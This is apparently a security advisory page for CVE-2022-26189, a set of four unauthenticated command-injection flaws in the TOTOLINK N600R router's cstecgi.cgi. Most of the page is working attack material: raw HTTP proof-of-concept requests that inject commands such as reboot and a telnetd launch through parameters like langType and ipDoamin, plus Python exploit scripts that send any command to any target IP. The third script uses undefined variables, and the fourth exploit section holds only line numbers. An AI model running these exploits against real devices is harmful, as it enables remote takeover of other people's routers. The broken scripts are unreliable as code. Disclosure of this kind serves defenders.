Headline

CVE-2022-26189: TOTOLINK_N600R_Command_Injection

TOTOLINK N600R V4.3.0cu.7570_B20200620 was discovered to contain a command injection vulnerability via the langType parameter in the login interface.

2 years ago

CVE

Open in Source

#vulnerability #web #ubuntu #linux #js #git

TOTOlink N600R Comand Injection****Venda

ToTolink N600R http://totolink.net/home/menu/detail/menu_listtpl/download/id/160/ids/36.html

link :http://totolink.net/data/upload/20200728/5fa781d2e6a17e1ed1cbf6f169810809.zip

Name:TOTOLINK_C8160R-1C_N600R_IP04291_8196D_SPI_4M32M_V4.3.0cu.7570_B20200620_ALL.web

ToTolink 7100RU:

Firmware_link: http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html

Name: TOTOLINK_C8540R-1C_A7100RU_IP04365_MT7621AMT7615Ex2_SPI_16M128M_V7.4cu.2313_B20191024_ALL.web

Vulnerability1****Detail

In TOTOLINK N600R equipment cstecgi.cgi file has command injection at the exportovpn interface, which can lead to unauthenticated RCE

Received the environment variable QUERY_STRING in the cstecgi.cgi binary file, which is the URL to visit

Later, it will be judged whether there is exportOvpn, and it is found that it can cause command injection by constructing a url request

POC

1
2
3
4
5
6
7
8
9
10
11
12

POST /cgi-bin/cstecgi.cgi?exportOvpn=&type=user&comand=;touch${IFS}1.txt;&filetype=gz HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

aaaaa

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

import sys
import requests
import json
command=sys.argv[1]
try:
ip=sys.argv[1]
port=sys.argv[2]
command=sys.argv[3]
except:
print “nonono! cant’t do this”
print "please use python exp.py [ip] [port] [command]"
exit()
url="http://%s:%s/cgi-bin/cstecgi.cgi?exportOvpn=&type=user&comand=;%s;&filetype=gz"%(ip,port,command)

headers={
"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With":"XMLHttpRequest",
"Origin":"http://%s:%s"%(ip,port),
}

requests.post(url,headers=headers)

verification

Vulnerability2****Detail

In TOTOLINK N600R equipment ,The vulnerability lies in cstecgi.cgi JSON data can be passed in the function of testing Ping, resulting in unauthenticated RCE

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Origin: http://192.168.0.1
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.1/adm/diagnosis.asp?timestamp=1636595925423
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 95

{"topicurl": "setting/setDiagnosisCfg", "actionFlag": "1", "ipDoamin": "www.baidu.com\nreboot\n"}

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

import sys
import requests
import json
try:
ip=sys.argv[1]
port=sys.argv[2]
except:
print “nonono! cant’t do this”
print "please use python exp.py [ip] [port] [command]"
exit()
url="http://%s:%s/cgi-bin/cstecgi.cgi"%(ip,port)

command=’ls -al’
headers={
"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With":"XMLHttpRequest",
"Origin":"http://%s:%s"%(ip,port),
}
data={
"topicurl":"setting/setDiagnosisCfg",
"actionFlag":"1",
"ipDoamin":"www.baidu.com\n{}\n".format(command)
}

print requests.post(url,headers=headers,data=json.dumps(data)).text

verification

Vulnerability3****Detail

In TOTOLINK N600R equipment, command injection at the change language of the login interface, which can lead to unauthenticated RCE

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/title.asp

{"topicurl":"setting/setLanguageCfg","langType":"cn;telnetd${IFS}-p${IFS}23;"}

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

import sys
import requests
import json
try:
ip=sys.argv[1]
port=sys.argv[2]
command=sys.argv[3]
except:
print “nonono! cant’t do this”
print "please use python exp.py [ip] [port] [command]"
exit()
url="http://%s:%s/cgi-bin/cstecgi.cgi"%(ip,port)

requests.post(url,headers=headers,data=json.dumps(data))

verification

Vulnerability4****Detail

In TOTOLINK N600R equipment,Command injection at setting/NTPSyncWithHost can lead to unauthenticated RCE

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/adm/ntp.asp?timestamp=1636598045521
Cookie: SESSION_ID=2:1609945786:2

{"topicurl":"setting/NTPSyncWithHost","hostTime":"2021-11-11 10:34:09\"\nreboot\n\""}

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30